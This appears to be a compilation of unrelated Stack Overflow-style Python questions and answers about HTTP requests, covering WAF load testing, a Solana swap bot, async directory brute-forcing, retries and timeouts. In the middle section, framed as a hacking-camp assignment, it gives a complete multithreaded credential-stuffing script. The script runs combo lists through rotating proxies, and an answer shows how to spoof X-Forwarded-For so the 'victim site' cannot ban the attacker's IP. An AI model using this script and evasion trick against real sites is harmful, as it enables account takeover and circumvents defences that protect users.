I am trying to test AWS WAF using Python 3. The idea is to send 500 to 1000 HTTP requests in N seconds/minutes and print the status code of each request. The time needs to be specified by the user, e.g. send 1000 requests in 5 minutes, or send all 1000 requests in 1 second.
I am not able to implement the timing.
How can I make this work? Below is my code so far:
import requests
import time
import threading
countRequests = 0
countSuccessRequests = 0
countFailedRequests = 0
countAllowRequests = 0
countBlockedRequests = 0
coubtErrors = 0
class Requester(threading.Thread):
    def __init__(self, url, w):
        threading.Thread.__init__(self)
        self.url = url
        self.w = w

    def run(self):
        global countRequests
        global countSuccessRequests
        global countFailedRequests
        global countAllowRequests
        global countBlockedRequests
        global coubtErrors
        try:
            r = requests.get(self.url)
            countSuccessRequests += 1
            if r.status_code == 200:
                countAllowRequests += 1
                print(f"countRequest: {countAllowRequests}, statusCode: {r.status_code}")
            if r.status_code == 403:
                countBlockedRequests += 1
                print(f"Blocked: {countBlockedRequests}, statusCode: {r.status_code}")
            if r.status_code != 200 and r.status_code != 403:
                print(f'Failed: code= {r.status_code}, sample: {self.w}')
        except (requests.Timeout, requests.ConnectionError, requests.HTTPError) as err:
            countFailedRequests += 1

if __name__ == '__main__':
    url = 'URL-HERE'
    print(f"url: {url}")
    requ = 150
    for w in range(1, requ, +1):
        req = Requester(url, w)
        req.start()
        time.sleep(0)
I tried searching on Stack Overflow, but I was not able to build the logic for it.
I would appreciate it if someone could point me to the correct thread or help me build one.
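For reference, here is a minimal sketch of one way to pace the requests: divide the total duration by the number of requests and sleep that interval between thread starts. The URL, request count, and duration below are placeholders, and a lock guards the shared counters since several threads update them.

import threading
import time

import requests

results_lock = threading.Lock()
status_counts = {}  # status code -> number of responses seen

def fire_request(url, index):
    """Send one GET request and record its status code."""
    try:
        r = requests.get(url, timeout=10)
        with results_lock:
            status_counts[r.status_code] = status_counts.get(r.status_code, 0) + 1
        print(f"request {index}: status {r.status_code}")
    except requests.RequestException as err:
        print(f"request {index}: failed ({err})")

def run_load(url, total_requests, duration_seconds):
    """Spread total_requests evenly over duration_seconds."""
    interval = duration_seconds / total_requests  # 0 means fire as fast as possible
    threads = []
    for i in range(total_requests):
        t = threading.Thread(target=fire_request, args=(url, i))
        t.start()
        threads.append(t)
        time.sleep(interval)
    for t in threads:
        t.join()
    print(f"status code summary: {status_counts}")

if __name__ == "__main__":
    # Placeholder values: 1000 requests spread over 5 minutes (300 seconds).
    run_load("http://example.com/", 1000, 300)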
I am having some trouble with my program: when it reaches the end of the third() function, it continues trying to execute transactions. I tried having it return None to break out of the seemingly infinite loop it is in, with no success. I am sure I am missing something very simple here, and I am guessing it has something to do with the recursion that I used. Thanks for any help that you can provide.
import asyncio
import base64
import json
import os
import os.path
import time
import httpcore
import requests
from typing import Awaitable
import solana
import httpx
from rich import print
from solana.keypair import Keypair
from solana.publickey import PublicKey
from solana.rpc.api import Client
from solana.rpc.async_api import AsyncClient
from solana.rpc.commitment import Confirmed
from solana.rpc.types import TxOpts
from solana.transaction import Transaction
# Notes
# This is meant as a bare bones hello world and as such does not have :
#
# - error handling on http calls
# - checks / retries to ensure solana transactions go through
# - logging - just your basic print statement here. But at least you get the Rich pretty printing variant :)
#
# Libraries used
# - https://www.python-httpx.org/ - cause it's shinier and better than requests
# - https://michaelhly.github.io/solana-py/
# - https://github.com/Textualize/rich for pretty printing - because it rocks.
# I use poetry to manage dependencies but am not including the project file here for brevity.
# Mint constants
USDC_MINT = "EPjFWdd5AufqSSqeM2qN1xzybapC8G4wEGGkZwyTDt1v", 6
SOL_MINT = "So11111111111111111111111111111111111111112", 9
FAB_MINT = "EdAhkbj5nF9sRM7XN7ewuW8C9XEUMs8P7cnoQ57SYE96", 9
FUSD_MINT = "B7mXkkZgn7abwz1A3HnKkb18Y6y18WcbeSkh1DuLMkee", 8
# This works ok - most of the time
rpc_host = "https://api.mainnet-beta.solana.com"
filename = r"C:\Users\myname\.config\solana\burner.json"
def get_wallet_keypair(filename: str) -> Keypair:
    """Load a keypair from a filesystem wallet."""
    if not os.path.isfile(filename):
        raise Exception(f"Wallet file '{filename}' is not present.")
    with open(filename) as json_file:
        data = json.load(json_file)
    mid = len(data) // 2
    secret_key = data[:mid]
    secret_bytes = bytes(secret_key)
    keypair = Keypair.from_secret_key(secret_bytes)
    print(f"Public Key is: {keypair.public_key}")
    return keypair

async def get_quote(
        input_mint: str, output_mint: str, amount: int, slippage: float = 0.2):
    url_query = f"https://quote-api.jup.ag/v1/quote?outputMint={output_mint}&inputMint={input_mint}&amount={amount}&slippage={slippage}"
    print(url_query)
    async with httpx.AsyncClient() as client:
        r = await client.get(url_query)
        return r.json()

async def get_transaction(route: dict, user_key: str) -> dict:
    swap_url = "https://quote-api.jup.ag/v1/swap"
    input = {"route": route, "userPublicKey": user_key, "wrapUnwrapSOL": True}
    print(json.dumps(input, indent=2))
    async with httpx.AsyncClient() as client:
        r = await client.post(swap_url, json=input,
                              timeout=6.0)  # slightly longer timeout as the free rpc server can be a bit laggy
        return r.json()

def send_transaction(payer: Keypair, cc: Client, swap_transaction: str, opts: TxOpts) -> str:
    """Send a serialized transaction to the RPC node."""
    trans = Transaction.deserialize(base64.b64decode(swap_transaction))
    result = cc.send_transaction(trans, payer, opts=opts)
    txid = result["result"]
    print(f"transaction details :https://solscan.io/tx/{txid}")
    return txid
async def async_main(from_mint, from_decimals, to_mint, quantity):
    cc = Client(rpc_host)
    print(f" Converting {quantity} {from_mint} to {to_mint} with {from_decimals} Decimals")
    quote_quantity = quantity * (10 ** from_decimals)
    r = await get_quote(str(from_mint), str(to_mint), quote_quantity, slippage=2)
    quote, outAmount = r["data"][0], int(r['data'][0]['outAmountWithSlippage']) / (10 ** from_decimals)
    print("Out Amount =", outAmount)
    if quote := r["data"][0]:
        print(quote)

    # get the relevant transaction details
    trans = await get_transaction(quote, str(pubkey))
    setup_transaction = trans["setupTransaction"] if "setupTransaction" in trans else None
    swap_transaction = trans["swapTransaction"] if "swapTransaction" in trans else None
    cleanup_transaction = trans["cleanupTransaction"] if "cleanupTransaction" in trans else None
    opts = TxOpts(skip_preflight=True)

    # Setup transaction. Will create any missing accounts if required.
    if setup_transaction:
        print("Sending setup transaction")
        # print(setup_transaction)
        send_transaction(payer, cc, setup_transaction, opts)

    # This one actually does the business
    if swap_transaction:
        print("Sending swap transaction")
        txid = send_transaction(payer, cc, swap_transaction, opts)
        # Wait for the transaction to complete before looking it up on chain.
        # Clearly this is *not* the right way to do this. Retry in a loop or something fancy.
        await asyncio.sleep(20)
        result = cc.get_transaction(txid, commitment=Confirmed)
        print(result)

    # Haven't seen one of these needed yet. Hopefully the jup.ag devs can explain when it's required.
    if cleanup_transaction:
        print("Sending send transaction")
        send_transaction(payer, cc, cleanup_transaction, opts)

    print("Swap Complete !")
    return outAmount
def get_balance(input_mint):
    url = "https://api.mainnet-beta.solana.com"
    headers = {'Content-type': 'application/json'}
    if input_mint == "So11111111111111111111111111111111111111112":
        data = {"jsonrpc": "2.0", "id": 1, "method": "getBalance", "params": [f"{pubkey}"]}
        response = requests.post(url, data=json.dumps(data), headers=headers)
        response = response.text
        parsed = json.loads(response)
        # print(json.dumps(parsed, indent=4, sort_keys=True))
        accountBal = (parsed['result']['value']) / 10 ** SOL_MINT[1]
        print(accountBal)
    else:
        data = {"jsonrpc": "2.0", "id": 1, "method": "getTokenAccountsByOwner",
                "params": [f"{pubkey}",
                           {"mint": f"{input_mint}"}, {"encoding": "jsonParsed"}]}
        response = requests.post(url, data=json.dumps(data), headers=headers)
        response = response.text
        parsed = json.loads(response)
        # print(json.dumps(parsed, indent=4, sort_keys=True))
        accountBal = parsed['result']['value'][0]['account']['data']['parsed']['info']['tokenAmount']['uiAmount']
        print(accountBal)
    return accountBal
# usdc buys fusd fusd is sold for sol sol is sold for usdc
# (from_mint, from_decimals, to_mint, quantity):
class swaps:
    def __init__(self, input_mint, decimals, output_mint, amount):
        self.input_mint = input_mint
        self.decimals = decimals
        self.output_mint = output_mint
        self.amount = amount

    def swap(self):
        asyncio.run(async_main(self.input_mint, self.decimals, self.output_mint, self.amount))

def first(count, previous=0):
    try:
        if get_balance(USDC_MINT[0]) <= 1:
            time.sleep(1)
            count += 1
            if count >= 60:
                third(0)
            first(count)
    except TypeError:
        first(0)
    step1 = swaps(USDC_MINT[0], USDC_MINT[1], FUSD_MINT[0], get_balance(USDC_MINT[0]) if previous == 0 else previous)
    try:
        step1.swap()
    except httpx.ReadTimeout:
        print("Retrying")
        time.sleep(10)
        first(0)
    second(0)

def second(count, previous=0):
    try:
        if get_balance(FUSD_MINT[0]) <= 1:
            time.sleep(1)
            count += 1
            if count >= 60:
                first(0)
            second(count)
    except TypeError:
        second(0)
    step2 = swaps(FUSD_MINT[0], FUSD_MINT[1], SOL_MINT[0], get_balance(FUSD_MINT[0]) if previous == 0 else previous)
    try:
        step2.swap()
    except:
        print("Retrying")
        time.sleep(10)
        second(0)
    count = 0
    third(0)

def third(count, previous=0):
    if get_balance(SOL_MINT[0]) < .6:
        time.sleep(1)
        count += 1
        if count >= 60:
            second(0)
        third(count)
    step3 = swaps(SOL_MINT[0], SOL_MINT[1], USDC_MINT[0], get_balance(SOL_MINT[0]) - 0.5 if previous == 0 else previous)
    try:
        step3.swap()
    except:
        print("Retrying")
        time.sleep(10)
        third(previous)
    print("All Swaps Completed")
    return None
payer = get_wallet_keypair(filename)
pubkey = payer.public_key
loops = 0

if __name__ == "__main__":
    previousBalence = get_balance(USDC_MINT[0])
    print(f"Starting Balence: {previousBalence}")
    # for loops in range(5):
    first(0)
    loops += 1
    endBalance = get_balance((USDC_MINT[0]))
    print(f"End balence is {endBalance}")
    totalProfit = endBalance - previousBalence
    print(f"Total Profit is: {totalProfit}")
Edit: When the code keeps running, the output shows it trying to swap fUSD for SOL and SOL for USDC over and over again.
Solution: https://pastebin.com/8id7gfe4
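For illustration only (this is a sketch, not the linked pastebin solution): because first() calls second(), second() calls third(), and every retry calls back into an earlier step, each finished call returns into its caller's frame and the chain keeps executing. Replacing the mutual recursion with an explicit loop over the three steps avoids that. The sketch below reuses the swaps class, get_balance, and the mint constants from the code above; the httpx retry handling is trimmed for brevity.

def wait_for_balance(mint, minimum, max_checks=60):
    """Poll the balance until it reaches minimum, or give up after max_checks."""
    for _ in range(max_checks):
        try:
            balance = get_balance(mint)
            if balance >= minimum:
                return balance
        except (TypeError, IndexError):
            pass  # the token account may not exist yet
        time.sleep(1)
    return None

def run_cycle():
    """usdc -> fusd -> sol -> usdc as a flat sequence instead of mutual recursion."""
    steps = [
        (USDC_MINT, FUSD_MINT, 1),   # (from mint, to mint, minimum balance to proceed)
        (FUSD_MINT, SOL_MINT, 1),
        (SOL_MINT, USDC_MINT, 0.6),
    ]
    for (from_mint, from_decimals), (to_mint, _), minimum in steps:
        balance = wait_for_balance(from_mint, minimum)
        if balance is None:
            print(f"balance for {from_mint} never reached {minimum}, stopping")
            return
        # Leave some SOL behind for fees, mirroring the original third() step.
        amount = balance - 0.5 if from_mint == SOL_MINT[0] else balance
        swaps(from_mint, from_decimals, to_mint, amount).swap()
    print("All Swaps Completed")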
A word of notice: this is my first attempt at asyncio, so I might have done something really stupid.
The scenario is as follows:
I need to "http-ping" a humongous list of urls to check whether they respond with 200 or some other value. I get timeouts for each and every request, even though tools like gobuster report 200, 403, etc.
My code is something similar to this:
import asyncio,aiohttp
import datetime

#-------------------------------------------------------------------------------------
async def get_data_coroutine(session,url,follow_redirects,timeout_seconds,retries):
    #print('#DEBUG '+datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')+' '+url)
    try:
        async with session.get(url,allow_redirects=False,timeout=timeout_seconds) as response:
            status = response.status
            #res = await response.text()
            if( status==404):
                pass
            elif(300<=status and status<400):
                location = str(response).split("Location': \'")[1].split("\'")[0]
                print('#HIT '+datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')+' '+str(status)+' '+url+' ---> '+location)
                if(follow_redirects==True):
                    return await get_data_coroutine(session,location,follow_redirects,timeout_seconds,retries)
            else:
                print('#HIT '+datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')+' '+str(status)+' '+url)
            return None
    except asyncio.exceptions.TimeoutError as e:
        print('#ERROR '+datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')+' '+' '+' '+url+' TIMEOUT '+str(e))
        return None

#---------------------------------------------------------------------------
async def main(loop):
    base_url = 'http://192.168.59.37'
    extensions = ['','.html','php']
    fd = open('/usr/share/wordlists/dirb/common.txt','r')
    words_without_suffix = [x.strip() for x in fd.readlines()]#[-5:] #DEBUG!
    words_with_suffix = [base_url+'/'+x+y for x in words_without_suffix for y in extensions]
    follow = True
    total_timeout = aiohttp.ClientTimeout(total=60*60*24)
    timeout_seconds = 10
    retries = 1
    async with aiohttp.ClientSession(loop=loop,timeout=total_timeout) as session:
        tasks = [get_data_coroutine(session,url,follow,timeout_seconds,retries) for url in words_with_suffix]
        await asyncio.gather(*tasks)
        print('DONE')

#---------------------------------------------------------------------------
if(__name__=='__main__'):
    loop = asyncio.get_event_loop()
    result = loop.run_until_complete(main(loop))
Did I do something really wrong?
Any word of advice?
Thank you SO much!
Actually, I ended up finding an open issue in aio-libs/aiohttp:
https://github.com/aio-libs/aiohttp/issues/3203
There, a workaround is suggested that achieves what I need:
session_timeout = aiohttp.ClientTimeout(total=None, sock_connect=timeout_seconds, sock_read=timeout_seconds)

async with aiohttp.ClientSession(timeout=session_timeout) as session:
    async with session.get(url, allow_redirects=False, timeout=1) as response:
        ...
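For context, here is roughly how that workaround can slot into the code from the question. This is only a sketch: it keeps the question's single-session design, the target URL is a placeholder, and the per-request details (redirect following, retries) are trimmed.

import asyncio
import aiohttp

async def check_all(urls, timeout_seconds=10):
    # Per-socket connect/read timeouts instead of one total timeout,
    # following the workaround from the aiohttp issue above.
    session_timeout = aiohttp.ClientTimeout(
        total=None, sock_connect=timeout_seconds, sock_read=timeout_seconds
    )
    async with aiohttp.ClientSession(timeout=session_timeout) as session:
        async def check(url):
            try:
                async with session.get(url, allow_redirects=False) as response:
                    print(url, response.status)
                    return response.status
            except asyncio.TimeoutError:
                print(url, "TIMEOUT")
                return None
        return await asyncio.gather(*(check(u) for u in urls))

if __name__ == "__main__":
    # Placeholder target; substitute the wordlist-generated urls from the question.
    asyncio.run(check_all(["http://192.168.59.37/index.html"]))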
To answer your question: no, you did nothing wrong. I can't see anything wrong with your code in terms of http request/response/timeout handling.
If indeed all your requests to the host (http://192.168.59.37) are timing out, I suspect the issues you are experiencing are most likely down to how your network is resolving requests (or how your code is building the url).
You can confirm whether requests are independently succeeding/failing using a tool like curl, e.g.:
curl "http://192.168.59.37/abc.html"
I tested it locally by running
python3 -m http.server 8080
and placing empty files 'abc' and 'abc.html' in the same directory, updating the base_url:
base_url = "http://127.0.0.1:8080"
With my minor updates (code below), here's the output:
http://127.0.0.1:8080/.bashrc.php
#404
http://127.0.0.1:8080/.bashrc
#404
http://127.0.0.1:8080/.bashrc.html
#404
http://127.0.0.1:8080/abc
#HIT 2020-11-03 12:57:33 200 http://127.0.0.1:8080/abc
http://127.0.0.1:8080/zt.php
#404
http://127.0.0.1:8080/zt.html
#404
http://127.0.0.1:8080/zt
#404
http://127.0.0.1:8080/abc.html
#HIT 2020-11-03 12:57:33 200 http://127.0.0.1:8080/abc.html
http://127.0.0.1:8080/abc.php
#404
DONE
My updates are mostly minor, but they might help with further debugging:
For debugging, print the url. It is important to determine whether the code is building the url correctly. This highlighted to me that the 'php' extension is missing a ".", so it would be looking for abcphp, not abc.php.
Use response.ok to test for a successful http response; your code wasn't handling 500 errors (instead it was reporting a hit).
Use Python f-strings for cleaner formatting.
import asyncio
import aiohttp
import datetime

async def get_data_coroutine(session, url, follow_redirects, timeout_seconds, retries):
    try:
        async with session.get(
            url, allow_redirects=False, timeout=timeout_seconds
        ) as response:
            print(url)
            now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
            if response.ok:
                print(f"#HIT {now} {response.status} {url}")
            else:
                status = response.status
                if status == 404:
                    print("#404")
                elif 300 <= status and status < 400:
                    location = str(response).split("Location': '")[1].split("'")[0]
                    print(f"#HIT {now} {status} {url} ---> {location}")
                    if follow_redirects is True:
                        return await get_data_coroutine(
                            session, location, follow_redirects, timeout_seconds, retries
                        )
                else:
                    print("#ERROR ", response.status)
            return None
    except asyncio.TimeoutError as e:
        now = datetime.datetime.now().strftime("%Y-%m-%d %H:%M:%S")
        print(f"#ERROR {now} {url} TIMEOUT ", e)
        return None

async def main(loop):
    base_url = "http://127.0.0.1:8080"
    extensions = ["", ".html", ".php"]
    fd = open("/usr/share/wordlists/dirb/common.txt", "r")
    words_without_suffix = [x.strip() for x in fd.readlines()]
    words_with_suffix = [
        base_url + "/" + x + y for x in words_without_suffix for y in extensions
    ]
    follow = True
    total_timeout = aiohttp.ClientTimeout(total=60 * 60 * 24)
    timeout_seconds = 10
    retries = 1
    async with aiohttp.ClientSession(loop=loop, timeout=total_timeout) as session:
        tasks = [
            get_data_coroutine(session, url, follow, timeout_seconds, retries)
            for url in words_with_suffix
        ]
        await asyncio.gather(*tasks)
        print("DONE")

if __name__ == "__main__":
    loop = asyncio.get_event_loop()
    result = loop.run_until_complete(main(loop))
I run a loop of requests, and unfortunately a server timeout sometimes occurs. That's why I want to check the status code first, and if it is not 200, go back and repeat the last request until the status code is 200. An example of the code looks like this:
for i in range(0, len(table)):
    var = table.iloc[i]
    url = 'http://example.request.com/var/'
    response = requests.get(url)
    if response.status_code == 200:
        data = response.json()
    else:
        "go back to response"
I am appending the response data for every i, so I would like to keep retrying until the response code is 200 and then go on with the next i in the loop.
Is there any easy solution?
I believe you want to do something like this:
for i in range(0, len(table)):
    var = table.iloc[i]
    url = 'http://example.request.com/var/'
    response = requests.get(url)
    while response.status_code != 200:
        response = requests.get(url)
    data = response.json()
I made a small example that uses an infinite loop and break to demonstrate stopping once the status code is 200:
import requests

while True:
    url = 'https://stackoverflow.com/'
    response = requests.get(url)
    if response.status_code == 200:
        # found code
        print('found example')
        break
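If you do not want to hammer the server forever, a common variation is to cap the number of attempts and wait between them. This is only a sketch (the retry cap, delay, and URL are placeholders) that also treats network errors like a non-200 response:

import time
import requests

def get_with_retry(url, max_attempts=5, delay_seconds=2):
    """Return the response once it is 200, or None after max_attempts tries."""
    for attempt in range(max_attempts):
        try:
            response = requests.get(url, timeout=10)
            if response.status_code == 200:
                return response
        except requests.RequestException:
            pass  # treat connection problems like a failed attempt and retry
        time.sleep(delay_seconds)
    return None

response = get_with_retry('http://example.request.com/var/')
if response is not None:
    data = response.json()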
As part of an ethical hacking camp, I am working on an assignment where I have to make multiple login requests on a website using proxies. To do that, I've come up with the following code:
import requests
from Queue import Queue
from threading import Thread
import time
from lxml import html
import json
from time import sleep
from math import ceil  # used in the final stats summary
global proxy_queue
global user_queue
global hits
global stats
global start_time
def get_default_header():
    return {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'https://www.example.com/'
    }
def make_requests():
    global user_queue
    while True:
        uname_pass = user_queue.get().split(':')
        status = get_status(uname_pass[0], uname_pass[1].replace('\n', ''))
        if status == 1:
            hits.put(uname_pass)
            stats['hits'] += 1
        if status == 0:
            stats['fake'] += 1
        if status == -1:
            user_queue.put(':'.join(uname_pass))
            stats['IP Banned'] += 1
        if status == -2:
            stats['Exception'] += 1
        user_queue.task_done()
def get_status(uname, password):
    global proxy_queue
    try:
        if proxy_queue.empty():
            print 'Reloaded proxies, sleeping for 2 mins'
            sleep(120)
        session = requests.session()
        proxy = 'http://' + proxy_queue.get()
        login_url = 'http://example.com/login'
        header = get_default_header()
        header['X-Forwarded-For'] = '8.8.8.8'
        login_page = session.get(
            login_url,
            headers=header,
            proxies={
                'http': proxy
            }
        )
        tree = html.fromstring(login_page.text)
        csrf = list(set(tree.xpath("//input[@name='csrfmiddlewaretoken']/@value")))[0]
        payload = {
            'email': uname,
            'password': password,
            'csrfmiddlewaretoken': csrf,
        }
        result = session.post(
            login_url,
            data=payload,
            headers=header,
            proxies={
                'http': proxy
            }
        )
        if result.status_code == 200:
            if 'access_token' in session.cookies:
                return 1
            elif 'Please check your email and password.' in result.text:
                return 0
            else:
                # IP banned
                return -1
        else:
            # IP banned
            return -1
    except Exception as e:
        print e
        return -2
def populate_proxies():
    global proxy_queue
    proxy_queue = Queue()
    with open('nice_proxy.txt', 'r') as f:
        for line in f.readlines():
            proxy_queue.put(line.replace('\n', ''))

def hit_printer():
    while True:
        sleep(5)
        print '\r' + str(stats) + ' Combos/min: ' + str((stats['hits'] + stats['fake'])/((time.time() - start_time)/60)),
if __name__ == '__main__':
    global user_queue
    global proxy_queue
    global stats
    global start_time
    stats = dict()
    stats['hits'] = 0
    stats['fake'] = 0
    stats['IP Banned'] = 0
    stats['Exception'] = 0
    threads = 200
    hits = Queue()
    uname_password_file = '287_uname_pass.txt'
    populate_proxies()
    user_queue = Queue(threads)
    for i in range(threads):
        t = Thread(target=make_requests)
        t.daemon = True
        t.start()
    hit_printer = Thread(target=hit_printer)
    hit_printer.daemon = True
    hit_printer.start()
    start_time = time.time()
    try:
        count = 0
        with open(uname_password_file, 'r') as f:
            for line in f.readlines():
                count += 1
                if count > 2000:
                    break
                user_queue.put(line.replace('\n', ''))
        user_queue.join()
        print '####################Result#####################'
        while not hits.empty():
            print hits.get()
        ttr = round(time.time() - start_time, 3)
        print 'Time required: ' + str(ttr)
        print 'average combos/min: ' + str(ceil(2000/(ttr/60)))
    except Exception as e:
        print e
So it is expected to make many requests on the website through multiple threads, but it doesn't work as expected. After a few requests, the proxies get banned and it stops working. Since I'm disposing of each proxy after I use it, that shouldn't be the case. So I believe it might be due to one of the following:
In making multiple requests with multiple sessions, it is somehow failing to keep the sessions separate because it does not support asynchronicity.
The victim site bans IPs by group, e.g. banning all IPs starting with 132.x.x.x on receiving multiple requests from any of the 132.x.x.x IPs.
The victim site is using headers like 'X-Forwarded-For', 'Client-IP', 'Via', or a similar header to detect the originating IP. But that seems unlikely, because I can log in via my browser without any proxy and it doesn't throw any error, meaning my IP isn't exposed in any sense.
I am unsure whether I'm making an error in the threading part or the requests part; any help is appreciated.
I have figured out what the problem was, thanks to @Martijn Pieters; as usual, he's a life saver.
I was using elite-level proxies, so there was no way the victim site could have found my IP address directly; however, it was using X-Forwarded-For to detect my real IP address.
Since elite-level proxies do not expose the IP address and don't attach the Client-IP header, the only way the victim could detect my IP was via the latest address in X-Forwarded-For. The solution to this problem is setting the X-Forwarded-For header to a random IP address every time a request is made, which successfully spoofs the victim site into believing that the request is legit.
header['X-Forwarded-For'] = '.'.join([str(random.randint(0,255)) for i in range(4)])
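For completeness, a sketch of how that line could fit into the header helper from the question, so a fresh random address is generated on every call; this assumes random is imported at the top of the script and is only one way to wire it in:

import random

def get_default_header():
    return {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko/20100101 Firefox/54.0',
        'X-Requested-With': 'XMLHttpRequest',
        'Referer': 'https://www.example.com/',
        # Randomise the forwarded address on each call so the site cannot
        # recover the real client IP from this header.
        'X-Forwarded-For': '.'.join([str(random.randint(0, 255)) for i in range(4)]),
    }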
I have a Python application which uses the threading and requests modules for processing many pages. The basic function for page downloading looks like this:
def get_page(url):
    error = None
    data = None
    max_page_size = 10 * 1024 * 1024
    try:
        s = requests.Session()
        s.max_redirects = 10
        s.keep_alive = False
        r = s.get('http://%s' % url if not url.startswith('http://') else url,
                  headers=headers, timeout=10.0, stream=True)
        raw_data = io.BytesIO()
        size = 0
        for chunk in r.iter_content(4096):
            size += len(chunk)
            raw_data.write(chunk)
            if size > max_page_size:
                r.close()
                raise SpyderError('too_large')
        fetch_result = 'ok'
    finally:
        del s
It works well in most cases, but sometimes the application freezes because of a very slow connection to some server or some other network problem. How can I set up a guaranteed global timeout for the whole function? Should I use asyncio or coroutines?
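One possibility, shown only as a sketch: run get_page in a worker pool and bound the wait with concurrent.futures. Note that result(timeout=...) stops the caller from waiting but does not kill the worker thread, so the request itself should still carry its own connect/read timeouts; the pool size and deadline below are placeholders.

import concurrent.futures

# One shared pool, sized to however many pages are fetched in parallel.
_executor = concurrent.futures.ThreadPoolExecutor(max_workers=32)

def get_page_with_deadline(url, deadline_seconds=30):
    """Wait at most deadline_seconds for get_page(url), then give up."""
    future = _executor.submit(get_page, url)
    try:
        return future.result(timeout=deadline_seconds)
    except concurrent.futures.TimeoutError:
        # This only stops the wait; the worker keeps running in the background.
        return None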